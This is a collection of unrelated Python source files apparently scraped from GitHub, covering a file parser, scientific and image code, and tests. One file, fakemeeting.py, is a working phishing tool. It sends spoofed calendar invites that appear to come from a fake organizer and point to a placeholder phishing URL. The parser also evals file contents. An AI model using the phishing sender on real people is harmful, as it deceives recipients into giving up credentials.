''\n continue\n\n if flag:\n el = ', ' + el\n _el += el\n\n if closing_third_key_pattern.search(el):\n clean_line.append(_el)\n _el = ''\n flag = False\n\n return clean_line\n\n def get_dict_values(self, values: list):\n '''\n Documentation here\n '''\n k = [el.split('=')[0].strip() 
for el in values]\n v = [el.split('=')[1].strip() for el in values]\n k_v = dict(zip(k, v))\n\n pattern = re.compile(r'\\d\\s\\w|\\d\\)\\s\\w+|\\d\\)\\s\\%|\\d\\s\\%|\\(\\\"\\w+')\n for key, val in k_v.items():\n if re.search(r'\\(\\\"\\.\\./|\\(\\\"\\w+', val):\n val = [e.replace('\"', '').replace('(', '').replace(')', '').strip()\n for e in val.split(',')]\n val = tuple(val)\n k_v[key] = val\n continue\n\n if re.search(r'^INFO', key):\n val = val.replace('\"', '')\n k_v[key] = val\n continue\n\n if re.search(r'PVTFILE', key) and not re.search(r'\\(\\\"\\.\\./|\\(\\\"\\w+', val):\n k_v[key] = val.replace('\"', '')\n continue\n\n if pattern.search(val):\n if re.search(r'TERMINALS', key):\n val = val.replace('(', '').replace(')',\n '').replace(',', '')\n val = [e.strip() for e in val.split(' ')]\n _val = []\n _el = ''\n n = 0\n for el in val:\n n += 1\n if n == 1:\n _el = el\n continue\n\n if n == 2:\n el = ' ' + el\n _el += el\n _val.append(_el)\n n = 0\n continue\n VALUE = tuple(_val)\n k_v[key] = VALUE\n continue\n else:\n val = val.split(' ')\n VALUE = ' '.join([el for el in val[:-1]])\n UNIT = val[-1]\n plural = False\n VALUE = eval(VALUE)\n\n if isinstance(VALUE, tuple):\n plural = True\n\n k_v[key] = {\n f'VALUE{\"S\" if plural else \"\"}': VALUE,\n 'UNIT': UNIT.strip(',')\n }\n continue\n\n if re.search(r'\\d+\\.\\d+|^[0-9]*$', val):\n k_v[key] = eval(val)\n continue\n\n k_v[key] = val.replace('\"', '')\n\n return k_v\n\n def read(self, filename: str):\n '''\n Documentation here\n '''\n assert isinstance(\n filename, str), f'filename must be a string! Not {type(filename)}'\n \n try:\n\n with open(filename, 'r') as f:\n file = f.read()\n\n except:\n\n with open(os.path.sep + os.path.join(filename), 'r') as f:\n file = f.read()\n\n # Splitting Genkey in principal elements\n split_genkey_elements_pattern = re.compile('\\s\\n')\n genkey_elements = []\n\n for element in split_genkey_elements_pattern.split(file):\n genkey_elements.append(element)\n\n # Getting first level and second level Genkey keys\n first_level_key_pattern = re.compile('!\\s\\w+.+')\n first_level_keys = []\n second_level_keys = []\n\n for el in genkey_elements:\n genkey_element = ' '.join([c.strip() for c in el.split(' ')])\n _first_level_key = first_level_key_pattern.search(genkey_element)\n\n if _first_level_key:\n first_level_key = _first_level_key.group().replace('!', '').strip()\n first_level_keys.append(first_level_key)\n\n lines = self.clean_lines(el)\n elements = list(map(self.split_values, lines))\n second_keys = [el[0] for el in elements]\n list_values = [el[1:] for el in elements]\n values = list(map(self.get_dict_values, list_values))\n key_vals_list = list(zip(second_keys, values))\n\n key_vals_dict = {}\n for key in key_vals_list:\n key_vals_dict.setdefault(key[0], []).append(key[1])\n\n for key, val in key_vals_dict.items():\n if len(val) == 1:\n key_vals_dict[key] = key_vals_dict.get(key)[0]\n\n second_level_keys.append(key_vals_dict)\n\n # Putting together first and second level keys\n genkey_keys = list(zip(first_level_keys, second_level_keys))\n\n # Creating list of second level keys for duplicated first level keys\n for key in genkey_keys:\n self.setdefault(key[0], []).append(key[1])\n\n # Extracting second level keys from list if first level key is not duplicated.\n for key, val in self.items():\n if len(val) == 1:\n self[key] = self.get(key)[0]\n\n for key, val in self.items():\n if val == {}:\n self[key] = None\n\n\nif __name__ == \"__main__\":\n import doctest\n\n 
doctest.testmod()\n","repo_name":"crivero7/RackioAI","sub_path":"rackio_AI/readers/tpl/tpl_core.py","file_name":"tpl_core.py","file_ext":"py","file_size_in_byte":26588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5958771024","text":"# -*- coding: utf-8 -*-\n\nimport pandas as pd\nfrom pycaret.classification import load_model, predict_model\nfrom fastapi import FastAPI\nfrom pydantic import BaseModel\nimport os\n\n# Create the app\napp = FastAPI()\n\n# Load trained Pipeline\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\nMODEL_PATH = os.path.join(BASE_DIR, \"model/heart_predict\")\n\nmodel = load_model(MODEL_PATH)\n\n# Define Pydantic models\nclass HeartPredictInput(BaseModel):\n age: float\n sex: float\n cp: float\n trestbps: float\n chol: float\n fbs: float\n restecg: float\n thalach: float\n exang: float\n oldpeak: float\n slope: float\n ca: float\n thal: float\n\nclass HeartPredictOutput(BaseModel):\n prediction: int\n\n# Define predict function\n@app.post(\"/predict\", response_model=HeartPredictOutput)\ndef predict(data: HeartPredictInput):\n data = pd.DataFrame([data.dict()])\n predictions = predict_model(model, data=data)\n return {\"prediction\": predictions[\"prediction_label\"].iloc[0]}\n\nif __name__ == \"__main__\":\n import uvicorn\n uvicorn.run(app, host=\"127.0.0.1\", port=8000)\n","repo_name":"ipatriciahonorato/modulo-7","sub_path":"Ponderada 3/app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16690994085","text":"#程序文件ex17_3.py\r\nimport sympy as sp\r\n\r\nsp.var('x,y') #定义符号变量\r\nf = sp.Function('f') #定义符号函数\r\nu = f(x,y); ux = u.diff(x); uy = u.diff(y)\r\neq = x*ux - y*uy + y**2*u - y**2\r\nsp.pprint(eq) #显示方程\r\ns = sp.pdsolve(eq) #求通解\r\nsp.pprint(s) #显示通解\r\n\r\n","repo_name":"LuyuZhang00/CUMCM2022","sub_path":"python数学建模算法与应用/17第17章 偏微分方程/ex17_3.py","file_name":"ex17_3.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"zh","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"21391343999","text":"\"\"\"Test interpolation.\n\npoetry run pytest tests/test_html/test_interpolation.py\n\"\"\"\nimport pytest\n\nfrom src.djlint.reformat import formatter\nfrom tests.conftest import printer\n\ntest_data = [\n pytest.param(\n (\n \"
<div>Fuga magnam facilis. Voluptatem quaerat porro.{{\n"\n \"x => {\n"\n \" const hello = 'world'\n"\n \" return hello;\n"\n \"}\n"\n \"}} Magni consectetur in et molestias neque esse voluptatibus voluptas. {{\n"\n \"\n"\n \"\n"\n \" some_variable\n"\n \"}} Eum quia nihil nulla esse. Dolorem asperiores vero est error {{\n"\n \" preserve\n"\n \" invalid\n"\n \"\n"\n \" interpolation\n"\n \"}} reprehenderit voluptates minus {{console.log( short_interpolation )}} nemo.</div>\n"\n ),\n (\n \"\n"\n \"<div>\n"\n \" Fuga magnam facilis. Voluptatem quaerat porro.{{\n"\n \" x => {\n"\n \" const hello = 'world'\n"\n \" return hello;\n"\n \" }\n"\n \" }} Magni consectetur in et molestias neque esse voluptatibus voluptas. {{\n"\n \" some_variable\n"\n \" }} Eum quia nihil nulla esse. Dolorem asperiores vero est error {{\n"\n \" preserve\n"\n \" invalid\n"\n \" interpolation\n"\n \" }} reprehenderit voluptates minus {{ console.log(short_interpolation) }} nemo.\n"\n \"</div>
        \\n\"\n ),\n id=\"interpolation_in_text\",\n ),\n]\n\n\n@pytest.mark.parametrize((\"source\", \"expected\"), test_data)\ndef test_base(source, expected, basic_config):\n output = formatter(basic_config, source)\n\n printer(expected, source, output)\n assert expected == output\n","repo_name":"Riverside-Healthcare/djLint","sub_path":"tests/test_html/test_interpolation.py","file_name":"test_interpolation.py","file_ext":"py","file_size_in_byte":1990,"program_lang":"python","lang":"en","doc_type":"code","stars":488,"dataset":"github-code","pt":"53"} +{"seq_id":"10606098307","text":"import time\r\nimport codecs\r\nimport smtplib\r\nimport datetime\r\nfrom email.mime.text import MIMEText\r\nfrom email.mime.base import MIMEBase\r\nfrom email.encoders import encode_base64\r\nfrom email.mime.multipart import MIMEMultipart\r\nfrom email.utils import COMMASPACE, formatdate\r\n\r\n\r\n# smtp settings\r\nSERVER = 'smtp.gmail.com'\r\nPORT = 587\r\nUSER_EMAIL = \"\"\r\nUSER_PASS = \"\"\r\n\r\n# email settings\r\nEMAIL_SUBJECT = \"Corona Meeting\"\r\n\r\n# event settings\r\nEVENT_DESCRIPTION = \"Corona Update Meeting\"\r\nEVENT_SUMMARY = \"Corona update meeting\"\r\n\r\nORGANIZER_NAME = \"Bill Gates\"\r\nORGANIZER_EMAIL = \"bill@microsoft.com\"\r\nATTENDEES = [\"bob@microsoft.com\", \"john@microsoft.com\"]\r\n\r\n# template settings\r\nEVENT_TEXT = \"Corona update\"\r\nEVENT_URL = \"https://phishing-url-here\"\r\n\r\n\r\ndef load_template():\r\n template = \"\"\r\n with codecs.open(\"email_template.html\", 'r', 'utf-8') as f:\r\n template = f.read()\r\n return template\r\n\r\n\r\ndef prepare_template():\r\n email_template = load_template()\r\n email_template = email_template.format(EVENT_TEXT=EVENT_TEXT, EVENT_URL=EVENT_URL)\r\n return email_template\r\n\r\n\r\ndef load_ics():\r\n ics = \"\"\r\n with codecs.open(\"iCalendar_template.ics\", 'r', 'utf-8') as f:\r\n ics = f.read()\r\n return ics\r\n\r\n\r\ndef prepare_ics(dtstamp, dtstart, dtend):\r\n ics_template = load_ics()\r\n ics_template = ics_template.format(DTSTAMP=dtstamp, DTSTART=dtstart, DTEND=dtend, ORGANIZER_NAME=ORGANIZER_NAME, ORGANIZER_EMAIL=ORGANIZER_EMAIL, DESCRIPTION=EVENT_DESCRIPTION, SUMMARY=EVENT_SUMMARY, ATTENDEES=generate_attendees())\r\n return ics_template\r\n\r\n\r\ndef generate_attendees():\r\n attendees = []\r\n for attendee in ATTENDEES:\r\n attendees.append(\"ATTENDEE;CUTYPE=INDIVIDUAL;ROLE=REQ-PARTICIPANT;PARTSTAT=ACCEPTED;RSVP=FALSE\\r\\n ;CN={attendee};X-NUM-GUESTS=0:\\r\\n mailto:{attendee}\".format(attendee=attendee))\r\n return \"\\r\\n\".join(attendees)\r\n\r\n\r\ndef send_email(to):\r\n print ('Sending email to: ' + to)\r\n\r\n # in .ics file timezone is set to be utc\r\n utc_offset = time.localtime().tm_gmtoff / 60\r\n ddtstart = datetime.datetime.now()\r\n dtoff = datetime.timedelta(minutes=utc_offset + 5) # meeting has started 5 minutes ago\r\n duration = datetime.timedelta(hours = 1) # meeting duration\r\n ddtstart = ddtstart - dtoff\r\n dtend = ddtstart + duration\r\n dtstamp = datetime.datetime.now().strftime(\"%Y%m%dT%H%M%SZ\")\r\n dtstart = ddtstart.strftime(\"%Y%m%dT%H%M%SZ\")\r\n dtend = dtend.strftime(\"%Y%m%dT%H%M%SZ\")\r\n\r\n ics = prepare_ics(dtstamp, dtstart, dtend)\r\n\r\n email_body = prepare_template()\r\n\r\n msg = MIMEMultipart('mixed')\r\n msg['Reply-To']=USER_EMAIL\r\n msg['Date'] = formatdate(localtime=True)\r\n msg['Subject'] = EMAIL_SUBJECT\r\n msg['From'] = USER_EMAIL\r\n msg['To'] = to\r\n\r\n part_email = MIMEText(email_body,\"html\")\r\n part_cal = 
MIMEText(ics,'calendar;method=REQUEST')\r\n\r\n    msgAlternative = MIMEMultipart('alternative')\r\n    msg.attach(msgAlternative)\r\n\r\n    ics_atch = MIMEBase('application/ics',' ;name=\"%s\"' % (\"invite.ics\"))\r\n    ics_atch.set_payload(ics)\r\n    encode_base64(ics_atch)\r\n    ics_atch.add_header('Content-Disposition', 'attachment; filename=\"%s\"' % (\"invite.ics\"))\r\n\r\n    eml_atch = MIMEBase('text/plain','')\r\n    eml_atch.set_payload(\"\")\r\n    encode_base64(eml_atch)\r\n    eml_atch.add_header('Content-Transfer-Encoding', \"\")\r\n\r\n    msgAlternative.attach(part_email)\r\n    msgAlternative.attach(part_cal)\r\n\r\n    mailServer = smtplib.SMTP(SERVER, PORT)\r\n    mailServer.ehlo()\r\n    mailServer.starttls()\r\n    mailServer.ehlo()\r\n    mailServer.login(USER_EMAIL, USER_PASS)\r\n    mailServer.sendmail(USER_EMAIL, to, msg.as_string())\r\n    mailServer.close()\r\n\r\n\r\ndef main():\r\n    send_email(\"\")\r\n\r\n\r\nmain()\r\n","repo_name":"ExAndroidDev/fakemeeting","sub_path":"fakemeeting.py","file_name":"fakemeeting.py","file_ext":"py","file_size_in_byte":3748,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"53"} +{"seq_id":"33531114939","text":"def formatTime(num_seconds):\n    num_seconds_in_a_minute = 60\n    num_seconds_in_an_hour = 3600\n    num_seconds_in_a_day = 3600*24\n    num_seconds_in_a_year = 3600*24*365\n    period_text_singular = ['year', 'day', 'hour', 'minute', 'second']\n    period_text_plural = ['years', 'days', 'hours', 'minutes', 'seconds']\n    time_calculation_index = 0\n    time_slice_calculated = []\n    time_slice_text = []\n    for time_slice in (num_seconds_in_a_year, num_seconds_in_a_day, num_seconds_in_an_hour, num_seconds_in_a_minute, 1):\n        quotient, remainder = divmod(num_seconds, time_slice)\n        if quotient >= 1:\n            time_slice_calculated.append(quotient)\n            time_slice_text.append(period_text_singular[time_calculation_index] if quotient == 1 else period_text_plural[time_calculation_index])\n            num_seconds = remainder\n        time_calculation_index += 1\n    output_string = ''\n    k = 0\n    for time_element in time_slice_calculated:\n        output_string += (\"{} {}{}\".format(str(time_element), time_slice_text[k], ', ' if len(time_slice_calculated)-k >2 else ' and ' if len(time_slice_calculated)-k == 2 else ''))\n        k += 1\n    return output_string if output_string else 'none'\n","repo_name":"marygomes/CodeChallenge01","sub_path":"formatTime.py","file_name":"formatTime.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21453404995","text":"# \"\"\"\n# This is ArrayReader's API interface.\n# You should not implement it, or speculate about its implementation\n# \"\"\"\n#class ArrayReader:\n#    def get(self, index: int) -> int:\n\nclass Solution:\n    def search(self, reader: 'ArrayReader', target: int) -> int:\n        l, r = 0, 10001\n        while l < r:\n            m = (l+r-1)//2\n            ret = reader.get(m)\n            if ret > target or ret == 2**31 - 1:  # out-of-bounds sentinel; ** is exponentiation ('^' would be XOR)\n                r = m\n            else:\n                l = m+1\n        if l == 0 or reader.get(l-1) != target:\n            return -1\n        return l-1\n    \n","repo_name":"jerrt2003/leetcode-in-python","sub_path":"702_Search_in_a_Sorted_Array_of_Unknown_Size/layoff.py","file_name":"layoff.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11662550083","text":"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nfrom matplotlib.animation import FuncAnimation\nimport sys\nfrom matplotlib import colors\nfrom 
IPython import embed\nfrom os import path\n\n# We define inverese and direct fft reversely, because the renormalisation\n# makes more sense: the fft should be an integral and thus have a factor 1/n in\n# front of the noise.\nfrom numpy.fft import fft as ifft\nfrom numpy.fft import ifft as fft\n\nclass burgers:\n\t\"\"\"\n\tWe model Burgers' equation via a Galerkin approximation and Neumann\n boundary conditions (so basis of cosines on the interval [0,2 pi])\n\t\"\"\"\n\tdef __init__(self):\n\n\t\t# Initial state of the system in terms of Fourier coefficients:\n\t\t# This is the number of eigenfunctions we use (for the definitions\n\t\t# below to work correctly with the Numpy implementation of the fast\n\t\t# Fourier transform this number should be odd: zeroth + first half positive,\n\t\t# + second half negative modes)\n\t\tself.N = 1601\n\t\t# And we set the time discretization for our problem\n\t\tself.dt = 0.0003\n\t\t# And we set the parameter a for the hyperviscosity (a =1 means\n\t\t# Laplacian: -(-Delta)^a)\n\t\tself.a = 1.0\n\n\t\t# We define the current value in real coordinates\n\t\tself.value1 = 2*np.ones(shape = (self.N))\n\t\tself.value1[self.N//2:self.N] = 0\n\n\t\tself.value2 = 2*np.ones(shape = (self.N))\n\t\tself.value2[0:self.N//2] = 0\n\n\t\t# And on a coarser scale the value for the picture\n\t\tself.V = 701\n\t\tself.visual1 = np.ones(shape = (self.V))\n\t\tself.visual2 = np.ones(shape = (self.V))\n\n\t\t# The initial condition in its Fourier coefficients \n\t\tself.state1 = fft(self.value1)\n\t\tself.state2 = fft(self.value2)\n\n\t\t# Here we store the forces (the nonlinearity and the noise)\n\t\tself.nonli1 = np.zeros(shape = (self.N), dtype = complex)\n\t\tself.nonli2 = np.zeros(shape = (self.N), dtype = complex)\n\t\tself.noise = np.random.normal(loc = 0.0, scale =1.0, size =self.N)\n\n\t\t# We define the gradient as a multiplier in Fourier coordinates\n\t\tself.grad = np.zeros(shape = (self.N), dtype = complex)\n\t\tfor i in range(1,self.N//2+1):\n\t\t\tself.grad[i] = complex(0.0, -1.0*i)\n\t\tfor i in range(self.N//2 + 1, self.N):\n\t\t\tself.grad[i] = complex(0.0, 1.0*(i-self.N//2))\n\n\t\t# We define the resolvent of the fractional Laplacian as a multiplier\n\t\t# in Fourier coordinates\n\t\tself.relap = np.ones(shape = (self.N), dtype = complex)\n\t\tfor i in range(1,self.N//2+1):\n\t\t\tself.relap[i] = complex(1.0/(1.0+(i**(2*self.a))*self.dt), 0.0)\n\t\tfor i in range(self.N//2 + 1, self.N):\n\t\t\tself.relap[i] = complex(1.0/(1.0+((i-self.N//2)**(2*self.a))*self.dt), 0.0)\n\n\tdef evaluate(self):\n\t\t# This function adjourns the value of the real state of the system.\n\t\tself.value1 = ifft(self.state1, self.N).real\n\t\tself.value2 = ifft(self.state2, self.N).real\n\n\tdef visualize(self):\n\t\t# This function adjourns the value of the visualizer\n\t\tself.visual1 = ifft(self.state1, self.V).real\n\t\tself.visual2 = ifft(self.state2, self.V).real\n\n\tdef nonlinearity(self):\n\t\t# We define the nonlinearity d_x u^2 in Fourier coefficients\n\t\tself.evaluate()\n\t\tself.nonli1 = np.multiply(self.grad, fft(self.value1**2, self.N), dtype = complex)\n\t\tself.nonli2 = np.multiply(self.grad, fft(self.value2**2, self.N), dtype = complex)\n\n\tdef renoise(self):\n\t\t# We adjourn the noise\n\t\tself.noise = 0.5*np.random.normal(loc = 0.0, scale =1.0, size\n\t\t\t\t\t\t\t\t=self.N)*np.sqrt(self.N*self.dt)\n\n\tdef solver(self):\n\t\t# We do one more step in the implicit Euler approximation\n\n\t\t# We start by computing the nonlinearity and the 
noise\n\t\tself.nonlinearity()\n\t\tself.renoise()\n\n\t\tself.state1 = np.multiply(self.relap, self.state1 +\n\t\t\t\t\t\t\tself.dt*(self.nonli1)+ fft(self.noise), dtype = complex)\n\t\tself.state2 = np.multiply(self.relap, self.state2 +\n\t\t\t\t\t\t\tself.dt*(self.nonli2)+ fft(self.noise), dtype = complex)\n\ndef animate(i):\n\n\tglobal bu, space_pts, ax, fig, time_text\n\n\t# Real time is:\n\tani_time = i*bu.dt\n\n\t# Redefine the plot\n\tbu.visualize()\n\tlines_a.set_data(space_pts, np.fft.fftshift(bu.visual1))\n\tlines_b.set_data(space_pts, np.fft.fftshift(bu.visual2))\n\n\t# Set the new time\n\ttime_text.set_text(\"Time = {:2.3f}\".format(ani_time))\n\n\t# We print the step we are in\n\tsys.stdout.flush()\n\tsys.stdout.write(\"\\r Step = {}\".format(i))\n\n\t# And we do the next step:\n\tbu.solver()\n\treturn [lines_a,] + [lines_b,] + [time_text,]\n\nbu = burgers()\nspace_pts = np.linspace(-np.pi, np.pi, bu.V)\n\n# We set up the picture\nfig = plt.figure()\nax = plt.axes(xlim=(-np.pi -0.2, np.pi+0.2), ylim = (-5.0, 5.0))\ntime_text = ax.text(0.05, 0.95,'',horizontalalignment='left',verticalalignment='top', transform=ax.transAxes)\nlines_a, = ax.plot([],[], lw = 1.3)\nlines_b, = ax.plot([],[], lw = 1.3)\nplt.title(\"Hyperviscous Burgers'\")\n\n# We let the animation go.\nani = FuncAnimation(fig, animate, frames= 20000, repeat=False)\nmywriter = animation.FFMpegWriter(fps=20, bitrate=60000, extra_args=['-pix_fmt', 'yuv420p'])\nani.save('burgers.mp4',writer=mywriter)\n","repo_name":"rosati-tom/Simulation-of-some-SPDEs","sub_path":"burgers-viscous.py","file_name":"burgers-viscous.py","file_ext":"py","file_size_in_byte":4936,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"19850197333","text":"import cv2 as cv\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom numba import njit\n\ndef increase_brightness(img, value=30):\n hsv = cv.cvtColor(img, cv.COLOR_BGR2HSV)\n h, s, v = cv.split(hsv)\n\n lim = 255 - value\n v[v > lim] = 255\n v[v <= lim] += value\n\n final_hsv = cv.merge((h, s, v))\n img = cv.cvtColor(final_hsv, cv.COLOR_HSV2BGR)\n return img\n\ndef read_image(path: str):\n image = cv.imread(path)\n image_YUV = cv.cvtColor(cv.resize(image, (1280,720), cv.INTER_CUBIC), cv.COLOR_BGR2YUV)\n # cv.imshow('corners_window0', image_YUV)\n return image, image_YUV\n\ndef step_3_8(img, k_dist=15, rad=5, cor_thrsh = 0.05, use_dilate=True, white=False):\n equ = cv.equalizeHist(img)\n edges = cv.Canny(equ,100,200)\n cv.imshow('Edges', cv.resize(edges, (1280,720)))\n \n # Detector parameters\n blockSize = 2\n apertureSize = 3\n k = 0.04\n\n # Detecting corners\n corners = cv.cornerHarris(equ, blockSize, apertureSize, k)\n\n # Threshold for an optimal value\n mask = corners > cor_thrsh*corners.max()\n img[corners > cor_thrsh*corners.max()]=[0]\n\n # Drawing a circle around corners by given threshold\n for i in range(corners.shape[0]):\n for j in range(corners.shape[1]):\n if mask[i,j]:\n cv.circle(edges, (j,i), rad, (255), -1)\n\n # Showing the result\n if use_dilate:\n edges = cv.dilate(edges, cv.getStructuringElement(cv.MORPH_ELLIPSE, (3, 3)))\n cv.imshow('corners', edges)\n\n dst = cv.distanceTransform(edges, cv.DIST_L2, 3)\n cv.normalize(dst, dst, 0, 1., cv.NORM_MINMAX)\n cv.imshow('Distance Transform Image', cv.resize(dst, (1280,720)))\n integral_img = cv.integral(edges)\n output = adaptive_kernel(equ, integral_img, dst, k_dist, white)\n return output\n\n@njit\ndef adaptive_kernel(orig_img, integral_img, dst_map, k, 
white=False):\n output = np.empty_like(orig_img)\n for i in range(output.shape[0]):\n for j in range(output.shape[1]):\n ker_size = int(k*dst_map[i][j])\n if ker_size == 0:\n output[i][j] = orig_img[i][j]\n continue\n # clip if coordinates are out of the range\n x1, y1 = max(i - ker_size, 0), max(j - ker_size, 0)\n x2, y2 = min(i + ker_size, output.shape[0]-1), min(j + ker_size, output.shape[1]-1)\n # sum kernel\n left = (integral_img[x2][y1] + integral_img[x1][y2])\n right = (integral_img[x2][y2] + integral_img[x1][y1])\n if white:\n I_sum = right - left\n else:\n I_sum = left - right\n output[i][j] = I_sum/(2*(ker_size)**2)\n return output\n\ndef main():\n _, img = read_image(\"..\\image_example\\house.jpg\")\n output = step_3_8(img[:,:,0], k_dist=20, rad=3, use_dilate=True, white=False)\n output = np.clip(output,0,255)\n img[:,:,0] = output\n img = cv.cvtColor(img, cv.COLOR_YUV2BGR)\n cv.imwrite('final_img.jpg', img)\n cv.waitKey()\n\nif __name__==\"__main__\":\n main()","repo_name":"kprokofi/Computer-vision-tasks","sub_path":"hw_cv_part2/homework2.py","file_name":"homework2.py","file_ext":"py","file_size_in_byte":3018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70347984488","text":"#\n# Testing homie description for apparatus's cameras\n#\n# Author: cdeck3r\n#\n\nimport subprocess\nimport time\nfrom datetime import datetime\n\nimport pytest\n\n\nclass TestHomieApparatusCameras:\n def mqtt_sub(self, pytestconfig, topic, wait=2):\n broker = pytestconfig.getini('mqttbroker')\n process = subprocess.run(\n ['mosquitto_sub', '-h', broker, '-t', topic, '-W', str(wait)],\n stdout=subprocess.PIPE,\n universal_newlines=True,\n check=True,\n )\n # execute process\n return process.stdout.rstrip()\n\n def mqtt_pub(self, pytestconfig, topic, msg):\n broker = pytestconfig.getini('mqttbroker')\n process = subprocess.run(\n ['mosquitto_pub', '-h', broker, '-t', topic, '-m', msg],\n stdout=subprocess.PIPE,\n universal_newlines=True,\n check=True,\n )\n # execute process\n return process.stdout.rstrip()\n\n @pytest.mark.parametrize('waiting_time', [2])\n def test_homie_apparatus_shutter_button(self, pytestconfig, waiting_time):\n msg = self.mqtt_sub(pytestconfig, 'scanner/apparatus/cameras/last-button-push')\n # convert msg in number\n last_button_push = datetime.fromisoformat(msg).timestamp()\n\n # push the shutter-button, and read-out the last-button-push\n time.sleep(waiting_time)\n self.mqtt_pub(\n pytestconfig,\n 'scanner/apparatus/cameras/shutter-button/set',\n 'push',\n )\n time.sleep(waiting_time)\n msg = self.mqtt_sub(pytestconfig, 'scanner/apparatus/cameras/last-button-push')\n assert datetime.fromisoformat(msg).timestamp() > last_button_push\n","repo_name":"cdeck3r/3DScanner","sub_path":"src/homie-nodes/tests/test_homie_apparatus_cameras.py","file_name":"test_homie_apparatus_cameras.py","file_ext":"py","file_size_in_byte":1703,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"16351768944","text":"from os import listdir, makedirs\n# from os import remove\nfrom os.path import isfile, join, exists\n# from os.path import isdir\nfrom matplotlib.pyplot import subplot, imshow, clf\n# from matplotlib.pyplot import figure, plot\nfrom matplotlib.colors import rgb_to_hsv\nimport matplotlib.image as img\nimport numpy as np\nimport random\nfrom shutil import copyfile\n# from skimage.transform import resize\n# from skimage.morphology import label\n\n\ntraining_path = 
\"../data/stage1_train\"\n\ndef get_im_with_mask(directory, boundaries=True):\n\n image_dir = join(directory, \"images\")\n mask_dir = join(directory, \"masks\")\n\n image_names = listdir(image_dir)\n mask_names = listdir(mask_dir)\n\n image_path = join(image_dir, image_names[0])\n image = img.imread(image_path)\n\n mask_path = join(mask_dir, mask_names[0])\n mask = img.imread(mask_path)\n if boundaries:\n mask = outline_mask(mask)\n\n for i in range(1, len(mask_names)):\n mask_path = join(mask_dir, mask_names[i])\n if boundaries:\n mask += outline_mask(img.imread(mask_path))\n else:\n mask += img.imread(mask_path)\n return image[:, :, 0:3], mask\n\n\ndef plot_example():\n im, mask = get_example()\n plot_im_mask(im, mask)\n\n\ndef get_example():\n directory = training_path\n names = listdir(directory)\n index = random.randint(0, len(names)-1)\n im, mask = get_im_with_mask(join(directory, names[index]))\n return im, mask\n\n\ndef plot_im_mask(im, mask):\n clf()\n subplot(121)\n imshow(im)\n subplot(122)\n imshow(mask)\n\n\ndef pad_image(im, half):\n\n if len(im.shape) == 3:\n color = [0, 0, 0]\n im = np.stack(\n [np.lib.pad(im[:, :, c], half, mode='constant', constant_values=color[c]) for c in range(3)],\n axis=2\n )\n elif len(im.shape) == 2:\n im = np.lib.pad(im, half, mode=\"constant\")\n else:\n print(\"Unwritten code!!\")\n return im\n\n\ndef run_len_enc(input_matrix):\n num_cols, num_rows = input_matrix.shape\n input_array = np.reshape(input_matrix, [num_cols * num_rows], order='F')\n locations = np.where(input_array == 1)[0]\n run_len = []\n prev = -2\n for loc in locations:\n if loc > prev + 1:\n run_len.extend((loc + 1, 0))\n run_len[-1] += 1\n prev = loc\n return np.array(run_len)\n\n\ndef run_len_dec(input_array, num_cols, num_rows):\n out = np.zeros(num_cols * num_rows)\n n = len(input_array)\n for i in range(n):\n if i % 2 == 0:\n start = input_array[i]-1\n dist = input_array[i+1]\n out[start:start+dist] = 1\n out = np.reshape(out, [num_cols, num_rows], order='F')\n return out\n\n\ndef get_im(directory):\n image_dir = join(directory, \"images\")\n image_names = listdir(image_dir)\n image_path = join(image_dir, image_names[0])\n image = img.imread(image_path)\n\n return image[:, :, 0:3]\n\n\ndef outline_mask(mask, int_value=.5, boundary_value=1):\n output = mask * int_value\n num_rows, num_cols = mask.shape\n row, col = np.where(output == int_value)\n for i in range(len(row)):\n r = row[i]\n c = col[i]\n if r > 0:\n if mask[r-1, c] == 0:\n output[r, c] = boundary_value\n continue\n if r < num_rows-1:\n if mask[r+1, c] == 0:\n output[r, c] = boundary_value\n continue\n if c > 0:\n if mask[r, c-1] == 0:\n output[r, c] = boundary_value\n continue\n if c < num_cols-1:\n if mask[r, c+1] == 0:\n output[r, c] = boundary_value\n continue\n return output\n\n\ndef plot_im_and_mask(im, mask):\n clf()\n subplot(331)\n imshow(im)\n subplot(332)\n imshow(mask)\n subplot(333)\n imshow(rgb2gray(im))\n\n subplot(334)\n imshow(im[:, :, 0])\n subplot(335)\n imshow(im[:, :, 1])\n subplot(336)\n imshow(im[:, :, 2])\n\n nim = rgb_to_hsv(im)\n subplot(337)\n imshow(nim[:, :, 0])\n subplot(338)\n imshow(nim[:, :, 1])\n subplot(339)\n imshow(nim[:, :, 2])\n\n\ndef rgb2gray(rgb):\n gray = 0.2989 * rgb[:, :, 0] + 0.5870 * rgb[:, :, 1] + 0.1140 * rgb[:, :, 2]\n return gray\n\n\ndef save_boundary_images():\n directory = training_path\n image_dir = listdir(directory)\n for image in image_dir:\n path = join(directory, image)\n im, mask_b = get_im_with_mask(path)\n boundary = np.copy(mask_b)\n 
